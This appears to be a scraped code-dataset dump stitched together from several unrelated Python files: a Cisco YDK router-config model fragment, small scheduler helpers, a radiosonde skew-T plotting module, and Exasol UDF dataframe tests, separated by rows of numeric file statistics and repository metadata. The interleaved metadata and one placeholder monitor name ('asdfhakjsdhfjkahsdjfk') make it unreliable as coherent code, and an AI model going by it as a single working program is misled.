('enable', (YLeaf(YType.empty, 'enable'), ['Empty'])),
])
self.period = None
self.enable = None
self._segment_path = lambda: "unicast"
self._absolute_path = lambda: "Cisco-IOS-XR-infra-rt-check-cfg:rcc/ipv4/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Rcc.Ipv4.Unicast, ['period', 'enable'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_rt_check_cfg as meta
return meta._meta_table['Rcc.Ipv4.Unicast']['meta_info']
class Multicast(_Entity_):
"""
RCC configuration for multicast
.. attribute:: period
Period of check in milliseconds
**type**\: int
**range:** 100..600000
**units**\: millisecond
.. attribute:: enable
Enable RCC/LCC
**type**\: :py:class:`Empty<ydk.types.Empty>`
"""
_prefix = 'infra-rt-check-cfg'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Rcc.Ipv4.Multicast, self).__init__()
self.yang_name = "multicast"
self.yang_parent_name = "ipv4"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('period', (YLeaf(YType.uint32, 'period'), ['int'])),
('enable', (YLeaf(YType.empty, 'enable'), ['Empty'])),
])
self.period = None
self.enable = None
self._segment_path = lambda: "multicast"
self._absolute_path = lambda: "Cisco-IOS-XR-infra-rt-check-cfg:rcc/ipv4/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Rcc.Ipv4.Multicast, ['period', 'enable'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_rt_check_cfg as meta
return meta._meta_table['Rcc.Ipv4.Multicast']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_rt_check_cfg as meta
return meta._meta_table['Rcc.Ipv4']['meta_info']
def clone_ptr(self):
self._top_entity = Rcc()
return self._top_entity
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_rt_check_cfg as meta
return meta._meta_table['Rcc']['meta_info']
| 34.271739
| 173
| 0.521937
| 1,960
| 18,918
| 4.713265
| 0.067857
| 0.039835
| 0.049794
| 0.060078
| 0.908313
| 0.872158
| 0.863499
| 0.849643
| 0.849643
| 0.849643
| 0
| 0.020985
| 0.362723
| 18,918
| 551
| 174
| 34.333938
| 0.745272
| 0.184269
| 0
| 0.768683
| 0
| 0
| 0.102274
| 0.02887
| 0
| 0
| 0
| 0
| 0
| 1
| 0.099644
| false
| 0
| 0.060498
| 0
| 0.234875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1d16e046daa300e7c2cd081c16a2a79ce730a94a
| 244
|
py
|
Python
|
ana_lib/pl_utils.py
|
mcmahon-lab/ONN-QAT-SQL
|
9c25d953b5bbe25ea6f469d01ecb914d131fc212
|
[
"CC-BY-4.0"
] | 5
|
2021-05-18T15:59:21.000Z
|
2022-03-29T03:01:09.000Z
|
ana_lib/pl_utils.py
|
mcmahon-lab/ONN-QAT-SQL
|
9c25d953b5bbe25ea6f469d01ecb914d131fc212
|
[
"CC-BY-4.0"
] | null | null | null |
ana_lib/pl_utils.py
|
mcmahon-lab/ONN-QAT-SQL
|
9c25d953b5bbe25ea6f469d01ecb914d131fc212
|
[
"CC-BY-4.0"
] | null | null | null |
#Useful general functions
def default_scheduler(lr_scheduler):
return {'scheduler':lr_scheduler, 'monitor':'val_checkpoint_on'}
def default_scheduler2(lr_scheduler):
return {'scheduler':lr_scheduler, 'monitor':'asdfhakjsdhfjkahsdjfk'}
| 34.857143
| 72
| 0.790984
| 27
| 244
| 6.851852
| 0.518519
| 0.237838
| 0.324324
| 0.281081
| 0.475676
| 0.475676
| 0.475676
| 0
| 0
| 0
| 0
| 0.004505
| 0.090164
| 244
| 7
| 72
| 34.857143
| 0.828829
| 0.098361
| 0
| 0
| 0
| 0
| 0.318182
| 0.095455
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
1d3d9387cf786d93ed392f1068a55935df4fea0c
| 66
|
py
|
Python
|
src/__init__.py
|
OfekHarel/Horizon-Music
|
50c51b8f3bdf4e4703f56af943dcc1758d121efb
|
[
"MIT"
] | null | null | null |
src/__init__.py
|
OfekHarel/Horizon-Music
|
50c51b8f3bdf4e4703f56af943dcc1758d121efb
|
[
"MIT"
] | 2
|
2020-05-15T10:07:42.000Z
|
2021-01-18T09:59:21.000Z
|
src/__init__.py
|
OfekHarel/HorizonMusic
|
50c51b8f3bdf4e4703f56af943dcc1758d121efb
|
[
"MIT"
] | null | null | null |
from .utils import *
from .music_utils import *
from .ui import *
| 16.5
| 26
| 0.727273
| 10
| 66
| 4.7
| 0.5
| 0.468085
| 0.638298
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.181818
| 66
| 3
| 27
| 22
| 0.87037
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1d9b55758ab55998fb421205a193bc000dfb3c61
| 6,235
|
py
|
Python
|
Radiosonde/plot_skewT.py
|
franzihe/Python_Masterthesis
|
f6acd3a98edb859f11c3f1cd2bc62e31065f5f4a
|
[
"MIT"
] | null | null | null |
Radiosonde/plot_skewT.py
|
franzihe/Python_Masterthesis
|
f6acd3a98edb859f11c3f1cd2bc62e31065f5f4a
|
[
"MIT"
] | null | null | null |
Radiosonde/plot_skewT.py
|
franzihe/Python_Masterthesis
|
f6acd3a98edb859f11c3f1cd2bc62e31065f5f4a
|
[
"MIT"
] | null | null | null |
# coding: utf-8
# In[ ]:
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.lines import Line2D
from matplotlib.gridspec import GridSpec
import math
import pymeteo.interp as interp
import skewt_modi as skewt
# In[ ]:
### Define colorbar colors
champ = 255.
blue = np.array([1,74,159])/champ # for the date
memb_col_T = np.array([150,150,150])/champ # ensemble member color
memb_col_Td = np.array([173,255,47])/champ
# In[ ]:
def plot_skewT(T, Td, z, p, u, v, text, sfig, filename):
fig = plt.figure(1, figsize=(16, 20))#, edgecolor = 'k')
gs = GridSpec(1,12)
# sounding
ax1 = plt.subplot(gs[0,0:11])
skewt.plot_sounding_axes(ax1)
# plot Temperature
linecolor_T = skewt.linecolor_T
linewidth_T = skewt.linewidth_T
ax1.semilogy(T + skewt.skew(p),p, basey=math.e, color =linecolor_T, linewidth = (linewidth_T+1.5))
# plot dewpoint
linecolor_Td = skewt.linecolor_Td
linewidth_Td = skewt.linewidth_Td
ax1.semilogy(Td + skewt.skew(p), p, basey=math.e, color=linecolor_Td, linewidth = (linewidth_Td+1.5))
# wind barbs
ax4 = plt.subplot(gs[0,-1])
skewt.plot_wind_axes(ax4)
skewt.plot_wind_barbs(ax4,z,p,u,v)
# Add labels for levels based on surface parcel
Tmax = skewt.Tmax
Tmin = skewt.Tmin
# plot labels for std heights
# plevs_std = [100000,85000,70000,50000,40000,30000,25000,20000,15000]
plevs_std = skewt.plevs_std
for plvl in plevs_std:
zlvl = interp.interp_height(z,p,plvl)
skewt.label_m(Tmin+2.55,plvl, str(int(zlvl)), ax1)
# plot wind barbs on left side of plot. move this? right side?
pt_plot = 10000
if (u is not None and v is not None):
#draw_wind_line(axes)
for i in np.arange(0,len(z),2):
if (p[i] > pt_plot):
plt.barbs(Tmin+4,p[i],u[i],v[i], length=8, linewidth=2.)
# legend
ax5 = fig.add_subplot(1,1,1)
tT = r'Temperature'
lT = Line2D(range(10), range(10), linestyle='-', marker='', linewidth=(linewidth_T+1.5), color=linecolor_T)
tTd = r'Dew-point Temperature'
lTd = Line2D(range(10), range(10), linestyle='-', marker='', linewidth=(linewidth_Td+1.5), color=linecolor_Td)
plt.legend((lT, lTd,),(tT, tTd, ),
loc=(0.49,0.89), fontsize=24, handlelength=5)
ax5.set_axis_off()
# Adjust plot margins.
plt.subplots_adjust(left=0.03, bottom=0.03, right=0.97, top=0.97, wspace=0.12, hspace=0.12)
# set ylimit to 10000
# ax1.set_ylim([0,10000]
# ax4.set_ylim([0,10000]
# set day
ax1.text(0.98,0.96, text, # x, y
verticalalignment = 'bottom', horizontalalignment='right',
transform = ax1.transAxes,
color =blue, fontsize=30,
bbox={'facecolor':'white','alpha':.8, 'pad':10})
# savefig
if sfig == 1:
plt.savefig(filename,orientation = 'portrait', papertype = 'a4')#, dpi=300,bbox_inches=0)
plt.close()
def plot_skewT_EM(T, Td, z, p, u, v, hour, text, sfig, filename):
fig = plt.figure(1, figsize=(16, 20))#, edgecolor = 'k')
gs = GridSpec(1,12)
# sounding
ax1 = plt.subplot(gs[0,0:11])
skewt.plot_sounding_axes(ax1)
# plot Temperature
linecolor_T = skewt.linecolor_T
linewidth_T = skewt.linewidth_T
for ens_memb in range(1,10):
if len(T[ens_memb]) == 0:
continue
else:
ax1.semilogy(T[ens_memb][hour,:] +
skewt.skew(p[ens_memb][hour,:]), p[ens_memb][hour,:], basey=math.e,
color =memb_col_T, linewidth = (linewidth_T))
# plot dewpoint
linecolor_Td = skewt.linecolor_Td
linewidth_Td = skewt.linewidth_Td
for ens_memb in range(1,10):
if len(Td[ens_memb]) == 0:
continue
else:
ax1.semilogy( Td[ens_memb][hour,:] +
skewt.skew(p[ens_memb][hour,:]), p[ens_memb][hour,:], basey=math.e,
color=memb_col_Td, linewidth = (linewidth_Td))
ax1.semilogy(T[0][hour,:] + skewt.skew(p[0][hour,:]),p[0][hour,:], basey=math.e, color =linecolor_T, linewidth = (linewidth_T+1.5))
ax1.semilogy(Td[0][hour,:] + skewt.skew(p[0][hour,:]), p[0][hour,:], basey=math.e, color=linecolor_Td, linewidth = (linewidth_Td+1.5))
# wind barbs
ax4 = plt.subplot(gs[0,-1])
skewt.plot_wind_axes(ax4)
skewt.plot_wind_barbs(ax4,z[0][hour,:],p[0][hour,:],u[0][hour,:],v[0][hour,:])
# Add labels for levels based on surface parcel
Tmax = skewt.Tmax
Tmin = skewt.Tmin
# plot labels for std heights
# plevs_std = [100000,85000,70000,50000,40000,30000,25000,20000,15000]
plevs_std = skewt.plevs_std
for plvl in plevs_std:
zlvl = interp.interp_height(z[0][hour,:],p[0][hour,:],plvl)
skewt.label_m(Tmin+2.55,plvl, str(int(zlvl)), ax1)
# plot wind barbs on left side of plot. move this? right side?
pt_plot = 10000
if (u is not None and v is not None):
#draw_wind_line(axes)
for i in np.arange(0,len(z),2):
if (p[0][hour,:][i] > pt_plot):
plt.barbs(Tmin+4,p[0][hour,:][i],u[0][hour,:][i],v[0][hour,:][i], length=8, linewidth=2.)
# legend
ax5 = fig.add_subplot(1,1,1)
tT = r'Temperature'
lT = Line2D(range(10), range(10), linestyle='-', marker='', linewidth=(linewidth_T+1.5), color=linecolor_T)
tTd = r'Dew-point Temperature'
lTd = Line2D(range(10), range(10), linestyle='-', marker='', linewidth=(linewidth_Td+1.5), color=linecolor_Td)
plt.legend((lT, lTd,),(tT, tTd, ),
loc=(0.49,0.89), fontsize=24, handlelength=5)
ax5.set_axis_off()
# Adjust plot margins.
plt.subplots_adjust(left=0.03, bottom=0.03, right=0.97, top=0.97, wspace=0.12, hspace=0.12)
# set ylimit to 10000
# ax1.set_ylim([0,10000]
# ax4.set_ylim([0,10000]
# set day
ax1.text(0.98,0.96, text, # x, y
verticalalignment = 'bottom', horizontalalignment='right',
transform = ax1.transAxes,
color =blue, fontsize=30,
bbox={'facecolor':'white','alpha':.8, 'pad':10})
# savefig
if sfig == 1:
plt.savefig(filename,orientation = 'portrait', papertype = 'a4')#, dpi=300,bbox_inches=0)
else:
plt.show()
plt.close()
| 32.989418
| 138
| 0.616199
| 966
| 6,235
| 3.871636
| 0.199793
| 0.02139
| 0.012834
| 0.024064
| 0.860963
| 0.860963
| 0.851337
| 0.834759
| 0.823529
| 0.804278
| 0
| 0.080725
| 0.221171
| 6,235
| 188
| 139
| 33.164894
| 0.689456
| 0.156856
| 0
| 0.711712
| 0
| 0
| 0.029581
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.018018
| false
| 0
| 0.063063
| 0
| 0.081081
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d579b80a94a9b4e06283fbaf0d423f9fd18a94b6
| 34,808
|
py
|
Python
|
tests/test/python3/all/dataframe.py
|
exasol/script-languages
|
c5fc636a4ce18310d96d8dc5c019da7d033dc6f1
|
[
"MIT"
] | 6
|
2019-01-09T11:55:15.000Z
|
2021-06-25T19:52:42.000Z
|
tests/test/python3/all/dataframe.py
|
exasol/script-languages
|
c5fc636a4ce18310d96d8dc5c019da7d033dc6f1
|
[
"MIT"
] | 65
|
2018-12-12T08:40:38.000Z
|
2022-02-28T09:19:45.000Z
|
tests/test/python3/all/dataframe.py
|
exasol/script-languages
|
c5fc636a4ce18310d96d8dc5c019da7d033dc6f1
|
[
"MIT"
] | 9
|
2018-11-23T08:59:09.000Z
|
2020-02-04T12:56:35.000Z
|
#!/usr/bin/env python2.7
import os
import sys
from decimal import Decimal
from datetime import date
from datetime import datetime
sys.path.append(os.path.realpath(__file__ + '/../../../../lib'))
import udf
class PandasDataFrame(udf.TestCase):
def setUp(self):
self.query('CREATE SCHEMA FN2', ignore_errors=True)
self.query('OPEN SCHEMA FN2', ignore_errors=True)
self.create_col_defs = [
('C0','INT IDENTITY'),
('C1','Decimal(2,0)'),
('C2','Decimal(4,0)'),
('C3','Decimal(8,0)'),
('C4','Decimal(16,0)'),
('C5','Decimal(36,0)'),
('C6','DOUBLE'),
('C7','BOOLEAN'),
('C8','VARCHAR(500)'),
('C9','CHAR(10)'),
('C10','DATE'),
('C11','TIMESTAMP')
]
self.create_col_defs_str = ','.join(
'%s %s'%(name,type_decl)
for name, type_decl
in self.create_col_defs
)
self.col_defs = self.create_col_defs[1:]
self.col_defs_str = ','.join(
'%s %s'%(name,type_decl)
for name, type_decl
in self.col_defs
)
self.col_names = [name for name, type_decl in self.col_defs]
self.col_names_str = ','.join(self.col_names)
self.col_tuple = (
Decimal('1'),
Decimal('1234'),
Decimal('12345678'),
Decimal('1234567890123456'),
Decimal('123456789012345678901234567890123456'),
12345.6789,
True,
'abcdefghij',
'abcdefgh ',
date(2018, 10, 12),
datetime(2018, 10, 12, 12, 15, 30, 123000)
)
self.create_table_1()
self.create_table_2()
self.create_table_3()
def create_table(self,table_name,create_col_defs_str):
create_table_sql='CREATE TABLE %s (%s)' % (table_name,create_col_defs_str)
print("Create Table Statement %s"%create_table_sql)
self.query(create_table_sql)
def create_table_1(self):
self.create_table("TEST1",self.create_col_defs_str)
self.import_via_insert("TEST1",[self.col_tuple],column_names=self.col_names)
num_inserts = 9
for i in range(num_inserts):
insert_sql = 'INSERT INTO TEST1 (%s) SELECT %s FROM TEST1' % (self.col_names_str, self.col_names_str)
print("Insert Statement %s"%insert_sql)
self.query(insert_sql)
self.num_rows = 2**num_inserts
def create_table_2(self):
self.create_table("TEST2",self.create_col_defs_str)
self.col_tuple_1 = (
Decimal('1'),
Decimal('1'),
Decimal('1'),
Decimal('1'),
Decimal('1'),
1,
True,
'abcdefghij',
'abcdefgh ',
date(2018, 10, 12),
datetime(2018, 10, 12, 12, 15, 30, 123000)
)
self.import_via_insert("TEST2",[self.col_tuple_1],column_names=self.col_names)
self.col_tuple_2 = (
Decimal('1'),
Decimal('1234'),
Decimal('12345678'),
Decimal('1234567890123456'),
Decimal('123456789012345678901234567890123456'),
12345.6789,
True,
'abcdefghij',
'abcdefgh ',
date(2018, 10, 12),
datetime(2018, 10, 12, 12, 15, 30, 123000)
)
self.import_via_insert("TEST2",[self.col_tuple_2],column_names=self.col_names)
self.col_tuple_null = (None, None, None, None, None, None, None, None, None, None, None)
self.import_via_insert("TEST2",[self.col_tuple_null],column_names=self.col_names)
def create_table_3(self):
self.create_col_defs_3 = [
('C0','INT IDENTITY'),
('C1','INTEGER'),
]
self.create_col_defs_str_3 = ','.join(
'%s %s'%(name,type_decl)
for name, type_decl
in self.create_col_defs_3
)
self.col_defs_3 = self.create_col_defs_3[1:]
self.col_defs_str_3 = ','.join(
'%s %s'%(name,type_decl)
for name, type_decl
in self.col_defs_3
)
self.col_names_3 = [name for name, type_decl in self.col_defs_3]
self.col_names_str_3 = ','.join(self.col_names_3)
self.create_table("TEST3",self.create_col_defs_str_3)
self.test3_num_rows = 10
self.col_tuple_3 = [(i,) for i in range(self.test3_num_rows)]
self.import_via_insert("TEST3",self.col_tuple_3,column_names=self.col_names_3)
def test_dataframe_scalar_emits(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SCALAR SCRIPT
foo(%s)
EMITS(%s) AS
def run(ctx):
df = ctx.get_dataframe()
ctx.emit(df)
/
''' % (self.col_defs_str, self.col_defs_str))
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(%s) FROM FN2.TEST1' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
self.assertRowsEqual([self.col_tuple]*self.num_rows, rows)
def test_dataframe_scalar_returns(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SCALAR SCRIPT
foo(%s)
RETURNS DECIMAL(10,5) AS
import numpy as np
def run(ctx):
df = ctx.get_dataframe()
return np.asscalar(df.iloc[0, 0] + df.iloc[0, 1])
/
''' % (self.col_defs_str))
self.query(udf_sql)
print(udf_sql)
select_sql = 'SELECT foo(%s) FROM FN2.TEST1' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
self.assertRowsEqual([(Decimal('1235'),)]*self.num_rows, rows)
def test_dataframe_scalar_emits_no_iter(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SCALAR SCRIPT
foo(%s)
EMITS(%s) AS
def run(ctx):
df = ctx.get_dataframe()
df = ctx.get_dataframe()
df = ctx.get_dataframe()
ctx.emit(df)
/
''' % (self.col_defs_str, self.col_defs_str))
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(%s) FROM FN2.TEST1' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
self.assertRowsEqual([self.col_tuple]*self.num_rows, rows)
def test_dataframe_scalar_emits_col_names(self):
output_columns = 'X1 VARCHAR(5), X2 VARCHAR(5), X3 VARCHAR(5), X4 VARCHAR(5), X5 VARCHAR(5), X6 VARCHAR(5), X7 VARCHAR(5), X8 VARCHAR(5), X9 VARCHAR(5), X10 VARCHAR(5), X11 VARCHAR(5)'
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SCALAR SCRIPT
foo(%s)
EMITS(%s) AS
def run(ctx):
df = ctx.get_dataframe()
ctx.emit(*(df.columns.tolist()))
/
''' % (self.col_defs_str, output_columns))
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(%s) FROM FN2.TEST1' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
self.assertRowsEqual([tuple(self.col_names)]*self.num_rows, rows)
def test_dataframe_scalar_emits_unique(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SCALAR SCRIPT
foo(C0 INT)
EMITS(C0 INT) AS
import numpy as np
def run(ctx):
df = ctx.get_dataframe()
ctx.emit(np.asscalar(df.C0))
/
''')
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(C0) FROM FN2.TEST1'
print(select_sql)
rows = self.query(select_sql)
self.assertEqual(self.num_rows, len(set([x[0] for x in rows])))
def test_dataframe_scalar_emits_all_unique(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SCALAR SCRIPT
foo(C0 INT)
EMITS(C0 INT) AS
import numpy as np
def run(ctx):
df = ctx.get_dataframe(num_rows="all")
ctx.emit(np.asscalar(df.C0))
/
''')
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(C0) FROM FN2.TEST1'
print(select_sql)
rows = self.query(select_sql)
self.assertEqual(self.num_rows, len(set([x[0] for x in rows])))
def test_dataframe_scalar_emits_empty(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SCALAR SCRIPT
foo(%s)
EMITS(%s) AS
import pandas as pd
def run(ctx):
df = pd.DataFrame()
ctx.emit(df)
/
''' % (self.col_defs_str, self.col_defs_str))
print(udf_sql)
self.query(udf_sql)
with self.assertRaisesRegexp(Exception, 'emit DataFrame is empty'):
select_sql = 'SELECT foo(%s) FROM FN2.TEST1' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
def test_dataframe_scalar_emits_wrong_args0(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SCALAR SCRIPT
foo(%s)
EMITS(%s) AS
import pandas as pd
def run(ctx):
df = pd.DataFrame([[]])
ctx.emit(df)
/
''' % (self.col_defs_str, self.col_defs_str))
print(udf_sql)
self.query(udf_sql)
with self.assertRaisesRegexp(Exception, 'emit\(\) takes exactly 11 arguments \(0 given\)'):
select_sql = 'SELECT foo(%s) FROM FN2.TEST1' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
def test_dataframe_scalar_emits_wrong_args7(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SCALAR SCRIPT
foo(%s)
EMITS(%s) AS
def run(ctx):
df = ctx.get_dataframe()
df = df.iloc[:, 1:]
ctx.emit(df)
/
''' % (self.col_defs_str, self.col_defs_str))
print(udf_sql)
self.query(udf_sql)
with self.assertRaisesRegexp(Exception, 'emit\(\) takes exactly 11 arguments \(10 given\)'):
select_sql = 'SELECT foo(%s) FROM FN2.TEST1' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
def test_dataframe_set_emits(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT
foo(%s)
EMITS(%s) AS
def run(ctx):
df = ctx.get_dataframe(num_rows="all")
ctx.emit(df)
/
''' % (self.col_defs_str, self.col_defs_str))
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(%s) FROM FN2.TEST1' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
self.assertRowsEqual([self.col_tuple]*self.num_rows, rows)
def test_dataframe_set_returns(self):
from decimal import Decimal
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT
foo(%s)
RETURNS DECIMAL(10,5) AS
import numpy as np
def run(ctx):
df = ctx.get_dataframe(num_rows="all")
return np.asscalar(df.iloc[:, 0].sum())
/
''' % (self.col_defs_str))
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(%s) FROM FN2.TEST1' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
self.assertRowsEqual([(Decimal(self.num_rows),)], rows)
def test_dataframe_set_emits_iter(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT
foo(%s)
EMITS(%s) AS
def run(ctx):
while True:
df = ctx.get_dataframe(num_rows=1)
if df is None:
break
ctx.emit(df)
/
''' % (self.col_defs_str, self.col_defs_str))
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(%s) FROM FN2.TEST1' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
self.assertRowsEqual([self.col_tuple]*self.num_rows, rows)
def test_dataframe_set_emits_iter_getattr(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT
foo(%s)
EMITS(R VARCHAR(1000)) AS
def run(ctx):
BATCH_ROWS = 1
while True:
df = ctx.get_dataframe(num_rows=BATCH_ROWS)
if df is None:
break
ctx.emit(df.applymap(lambda x: "df_"+str(x)))
try:
ctx.emit("getattr_"+str(ctx.C1))
ctx.emit("eob") # end of batch
except:
ctx.emit("eoi") # end of iteration
/
''' % (self.col_defs_str_3))
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(%s) FROM FN2.TEST3' % (self.col_names_str_3)
print(select_sql)
rows = self.query(select_sql)
expected_result = [("df_"+str(self.col_tuple_3[0][0]),)]
for i in range(1,self.test3_num_rows):
expected_result.append(("getattr_"+str(self.col_tuple_3[i][0]),))
expected_result.append(("eob",))
expected_result.append(("df_"+str(self.col_tuple_3[i][0]),))
expected_result.append(("eoi",))
self.assertRowsEqual(expected_result, rows)
def test_dataframe_set_emits_iter_exception(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT
foo(%s)
EMITS(%s) AS
def run(ctx):
while True:
df = ctx.get_dataframe(num_rows=1)
if df is None:
#break
df = ctx.get_dataframe(num_rows=1)
ctx.emit(df)
/
''' % (self.col_defs_str, self.col_defs_str))
print(udf_sql)
self.query(udf_sql)
with self.assertRaisesRegexp(Exception, 'Iteration finished'):
select_sql = 'SELECT foo(%s) FROM FN2.TEST1' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
def test_dataframe_set_emits_iter_reset_at_end(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT
foo(%s)
EMITS(%s) AS
def run(ctx):
i = 0
while True:
df = ctx.get_dataframe(num_rows=3)
if df is None:
if i < 1:
ctx.reset()
i = i + 1
else:
break
else:
ctx.emit(df)
/
''' % (self.col_defs_str, self.col_defs_str))
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(%s) FROM FN2.TEST1' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
self.assertRowsEqual([self.col_tuple]*self.num_rows*2, rows)
def test_dataframe_set_emits_col_names(self):
output_columns = 'X1 VARCHAR(5), X2 VARCHAR(5), X3 VARCHAR(5), X4 VARCHAR(5), X5 VARCHAR(5), X6 VARCHAR(5), X7 VARCHAR(5), X8 VARCHAR(5), X9 VARCHAR(5), X10 VARCHAR(5), X11 VARCHAR(5)'
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT
foo(%s)
EMITS(%s) AS
def run(ctx):
while True:
df = ctx.get_dataframe(num_rows=1)
if df is None:
break
ctx.emit(*(df.columns.tolist()))
/
''' % (self.col_defs_str, output_columns))
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(%s) FROM FN2.TEST1' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
self.assertRowsEqual([tuple(self.col_names)]*self.num_rows, rows)
def test_dataframe_set_emits_unique(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT
foo(C0 INT)
EMITS(C0 INT) AS
import numpy as np
def run(ctx):
while True:
df = ctx.get_dataframe(num_rows=1)
if df is None:
break
ctx.emit(np.asscalar(df.C0))
/
''')
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(C0) FROM FN2.TEST1'
print(select_sql)
rows = self.query(select_sql)
self.assertEqual(self.num_rows, len(set([x[0] for x in rows])))
def test_dataframe_set_emits_all_unique(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT
foo(C0 INT)
EMITS(C0 INT) AS
import numpy as np
def run(ctx):
while True:
df = ctx.get_dataframe(num_rows="all")
if df is None:
break
for i in range(df.shape[0]):
ctx.emit(np.asscalar(df.iloc[i, 0]))
/
''')
print(udf_sql)
self.query(udf_sql)
select_sql = 'SELECT foo(C0) FROM FN2.TEST1'
print(select_sql)
rows = self.query(select_sql)
self.assertEqual(self.num_rows, len(set([x[0] for x in rows])))
def test_dataframe_set_emits_empty(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT
foo(%s)
EMITS(%s) AS
import pandas as pd
def run(ctx):
df = pd.DataFrame()
ctx.emit(df)
/
''' % (self.col_defs_str, self.col_defs_str))
print(udf_sql)
self.query(udf_sql)
with self.assertRaisesRegexp(Exception, 'emit DataFrame is empty'):
select_sql = 'SELECT foo(%s) FROM FN2.TEST1' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
def test_dataframe_set_emits_wrong_args0(self):
udf_sql = udf.fixindent('''
CREATE OR REPLACE PYTHON3 SET SCRIPT
foo(%s)
EMITS(%s) AS
import pandas as pd
def run(ctx):
df = pd.DataFrame([[]])
ctx.emit(df)
/
''' % (self.col_defs_str, self.col_defs_str))
print(udf_sql)
self.query(udf_sql)
with self.assertRaisesRegexp(Exception, 'emit\(\) takes exactly 11 arguments \(0 given\)'):
select_sql = 'SELECT foo(%s) FROM FN2.TEST1' % (self.col_names_str)
print(select_sql)
rows = self.query(select_sql)
def test_dataframe_set_emits_wrong_args7(self):
